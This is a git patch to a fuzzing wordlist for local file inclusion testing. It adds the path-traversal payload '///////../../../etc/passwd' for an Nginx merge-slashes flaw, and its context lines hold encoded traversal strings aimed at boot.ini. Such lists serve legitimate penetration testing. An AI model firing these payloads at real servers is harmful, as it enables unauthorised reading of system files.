From 694b4873eb9c1583ac5ca32178bf451bf30d80f3 Mon Sep 17 00:00:00 2001 From: indigo-sadland <37074372+indigo-sadland@users.noreply.github.com> Date: Mon, 18 Apr 2022 00:26:27 -0700 Subject: [PATCH] Nginx merge slashes path traversal vulnerability payload --- Fuzzing/LFI/LFI-Jhaddix.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/Fuzzing/LFI/LFI-Jhaddix.txt b/Fuzzing/LFI/LFI-Jhaddix.txt index 814c8b23..2451fdd7 100644 --- a/Fuzzing/LFI/LFI-Jhaddix.txt +++ b/Fuzzing/LFI/LFI-Jhaddix.txt @@ -917,3 +917,4 @@ Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4v %e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0 ..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini ..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini +///////../../../etc/passwd